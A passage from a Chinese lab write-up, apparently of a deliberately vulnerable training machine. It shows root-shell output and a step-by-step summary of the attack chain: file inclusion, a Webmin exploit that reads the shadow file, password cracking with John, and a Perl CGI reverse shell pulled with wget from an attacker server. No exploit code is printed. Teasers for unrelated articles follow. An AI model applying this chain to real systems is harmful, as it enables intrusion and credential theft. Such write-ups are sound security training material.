2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:5e:18:c9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.131/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe5e:18c9/64 scope link 
       valid_lft forever preferred_lft forever
# sudo -l
User root may run the following commands on this host:
    (ALL) ALL
# 

总结

主机发现,机器开放 22, 80, 10000 端口
80 端口发现 文件包含,可读到 /etc/passwd,但是没有读到 /etc/shadow
漏洞脚本扫描结合浏览器访问观察,发现 10000 端口运行 webmin,搜索漏洞脚本利用
使用 perl 脚本读取 /etc/passwd 和 /etc/shadow 内容,使用 john 破解 shadow,拿到 vmware 用户的明文密码
使用 ssh 登录,期间配置 ssh 参数。获得初级 shell,观察无 sudo 权限,尝试提权
信息收集发现系统的 /var/www 和 /var/webmin 由 root 用户创建,权限较高,考虑尝试反弹perl cgi 反弹 shell
kali 用 php 开一个临时服务器,放上构造好的 perl CGI shell,并监听端口
shell 使用 wget 下载 反弹 shell shell.cgi,使用之前的 webmin perl 利用脚本请求 shell.cgi 的地址,因为这个脚本可以指定服务器内路径访问文件
拿到 root shell,结束

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2192078.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

解决 OpenCloudOS 中 yum 安装 yum-utils 命令报错的问题

目录 前言1. 问题背景与错误分析2. 深入分析错误原因2.1 OpenCloudOS 与 CentOS 之间的区别2.2 文件冲突的具体分析 3. 解决方案3.1 使用 --replacefiles 强制安装3.2 使用 yum swap 替换冲突包3.3 手动调整冲突包 4. 预防与优化建议4.1 确保软件源的兼容性4.2 定期更新系统 结…

爆赞!豆瓣9.6,多语言版本全球发行,程序员入门大模型必读之作!

当一本书的内容足够好&#xff0c;它就会拥有多个语言版本 我已将这本大模型书免费分享出来&#xff0c;需要的小伙伴可以扫取。 在这个信息全球化的时代&#xff0c;一本书籍的卓越内容往往能够跨越语言的界限&#xff0c;触及世界各地读者的心灵。今天&#xff0c;我们庆祝…

617、合并二叉树

1、题目描述 . - 力扣&#xff08;LeetCode&#xff09; 规则&#xff1a;一个二叉树覆盖到另一颗二叉树上。 (1)重复的节点就将节点值做累加 (2)不重复的节点就取并集。 最终得到一个全新的二叉树&#xff0c;如下图所示。 2、分析 分析&#xff1a;也属于构造二叉树&#x…

Llama 3.2 安卓手机安装教程

在刚刚结束的Meta开发者大会上&#xff0c;Llama 3.2惊艳亮相。此次&#xff0c;它不仅拥有多模态能力&#xff0c;还与Arm等公司合作&#xff0c;推出了专门针对高通、联发科硬件优化的“移动”版本。 NSDT工具推荐&#xff1a; Three.js AI纹理开发包 - YOLO合成数据生成器 -…

Centos Stream 9备份与恢复、实体小主机安装PVE系统、PVE安装Centos Stream 9

最近折腾小主机&#xff0c;搭建项目环境&#xff0c;记录相关步骤 数据无价&#xff0c;丢失难复 1. Centos Stream 9备份与恢复 1.1 系统备份 root权限用户执行进入根目录&#xff1a; cd /第一种方式备份命令&#xff1a; tar cvpzf backup.tgz / --exclude/proc --exclu…

参数标准+-db和-db

-db是因为比值是相近的&#xff0c;值越进行越好&#xff0c;正负db代表两个值差异不大&#xff0c;可以分子比分母大或者分母比分子大-db代表串扰&#xff0c;分子比分母小&#xff0c;所以负db的值越小越好

探索 GraphRAG:从存储到查询,深入解析 NebulaGraph 与传统 SQL 的对比

近年来&#xff0c;图数据库逐渐成为大数据和人工智能领域的热议话题。特别是随着 GraphRAG 技术的火爆&#xff0c;如何高效存储和查询大规模图数据成为很多开发者关心的问题。出于好奇&#xff0c;我最近尝试了 GraphRAG 并研究其存储结构&#xff0c;因此决定进一步探索图数…

(笔记)第三期书生·浦语大模型实战营(十一卷王场)–书生基础岛第3关---浦语提示词工程实践

学员闯关手册&#xff1a;https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?open_in_browsertrue 课程视频&#xff1a;https://www.bilibili.com/video/BV1cU411S7iV/ 课程文档&#xff1a; https://github.com/InternLM/Tutorial/tree/camp3/docs/L1/Prompt 关…

2024年最新大模型LLM学习路径全解析!看完你就是LLM大师

ChatGPT的出现在全球掀起了AI大模型的浪潮&#xff0c;2023年可以被称为AI元年&#xff0c;AI大模型以一种野蛮的方式&#xff0c;闯入你我的生活之中。 从问答对话到辅助编程&#xff0c;从图画解析到自主创作&#xff0c;AI所展现出来的能力&#xff0c;超出了多数人的预料&…

aws(学习笔记第二课) AWS SDK(node js)

aws(学习笔记第二课) 使用AWS SDK&#xff08;node js&#xff09; 学习内容&#xff1a; 使用AWS SDK&#xff08;node js&#xff09; 1. AWS SDK&#xff08;node js&#xff09; AWS支持多种SDK开发(除了AWS CLI&#xff0c;还支持其他的SDK) AndroidPythonNode.js(Javas…

【梯级水电站调度优化】基于标准粒子群

课题名称&#xff1a; 基于标准粒子群算法的梯级水电站调度优化 代码获取方式&#xff08;付费&#xff09;&#xff1a; 相关资料&#xff1a; 1. 粒子群算法的基本原理 2. 梯级水电站调度优化模型 3. 代码注释 4. 代码讲解视频&#xff08;个人录制&#xff09; 程序实…

【电路笔记】-运算放大器微分器

运算放大器微分器 文章目录 运算放大器微分器1、概述2、运算放大器微分器的表示2.1 理想微分器2.2 输出公式2.3 交流分析3、实际微分器3.1 理想配置的局限性3.2 带串联电阻的伪微分器3.3 具有并联电容器的伪微分器4、总结1、概述 在我们之前关于积分器运算放大器的文章中,我们…

数据库概述(3)

课程主页&#xff1a;Guoliang Li Tsinghua 继续补充DBMS概况&#xff1a; DBMS概况 存储管理层 缓冲区管理 为了持久保存数据库里面的数据&#xff0c;必定要做持久化技术&#xff0c;也就是会用到磁盘&#xff0c;然而磁盘读取数据的速度是比较慢的&#xff0c;一般是毫…

港股大跌敲响警钟

10月3日&#xff0c;港股早间突如其来的下跌一度登上热搜榜&#xff0c;而午后回暖的恒指则一度抹去跌幅持平。截至当日收盘&#xff0c;恒指跌1.47%&#xff0c;报22&#xff0c;113.51点&#xff0c;守住了22000点关口&#xff1b;恒生科技指数跌、跌3.46%&#xff0c;报4978…

好用耐用充电宝品牌有哪些?推荐2024年热门款充电宝

作为一位热衷于探索各种数码产品的测评博主&#xff0c;今天我又来给大家带来满满的干货啦&#xff01;在这个智能手机不离手的年代&#xff0c;拥有一款好用耐用的充电宝简直就成了出行必备。那么&#xff0c;在众多品牌和型号中&#xff0c;哪些充电宝真正值得我们入手呢&…

机器学习系列篇章0 --- 人工智能机器学习相关概念梳理

说明 人工智能(Artificial Intelligence, AI)是大势所趋&#xff0c;我们正处于一个AI开始大爆发的时代&#xff0c;基于AI的各类工具在科研、生产、生活各方各面给我们带来了巨大的便利和影响(好的以及坏的)&#xff0c;有关AI的一切我们不可不察。 我并非计算机这个行当的科…

msvcp140dll丢失是怎回事,对比哪种解决方法更简单有效

1. msvcp140.dll 简介 1.1 定义与作用 msvcp140.dll 是 Microsoft Visual C 2015 Redistributable Package 的一部分&#xff0c;它包含了 C 运行时库的函数和类&#xff0c;这些库是支持 Windows 应用程序运行的关键组件。msvcp140.dll 文件提供了对 C 程序中常用的功能的支…

Jedis多线程环境报错:redis Could not get a resource from the pool 的主要原因及解决办法。

本篇文章主要讲解&#xff0c;Jedis多线程环境报错&#xff1a;redis Could not get a resource from the pool 的主要原因及解决办法。 作者&#xff1a;任聪聪 日期&#xff1a;2024年10月6日01:29:21 报错信息&#xff1a; 报文&#xff1a; redis Could not get a resou…

影刀RPA实战:Excel密码与字典功能指令

1.实战目标 本次主要讲解下影刀RPA操作Excel密码保护和数据列生成字典&#xff0c;在工作中&#xff0c;我们经常会遇到合作公司给我们发的表格&#xff0c;或是电商平台下载订单Excel数据表都带有密码&#xff0c;这在自动化处理过程中&#xff0c;多少带来不变&#xff0c;影…

cnn突破五(公式)

三层网络反向传播公式推导&#xff1a; X【196】-》HI【80】/HO【80】-》YI【10】/YO【10】&#xff0c;期望是d【10】 X&#xff0c;HI之间用w1【196&#xff0c;80】 HO&#xff0c;YI之间用w2【80,10】 k10;j80;i196 (yo[k]-d[k])*ds(yo[k])*ho[j]; (yo[k]-d[k])*ds(yo[…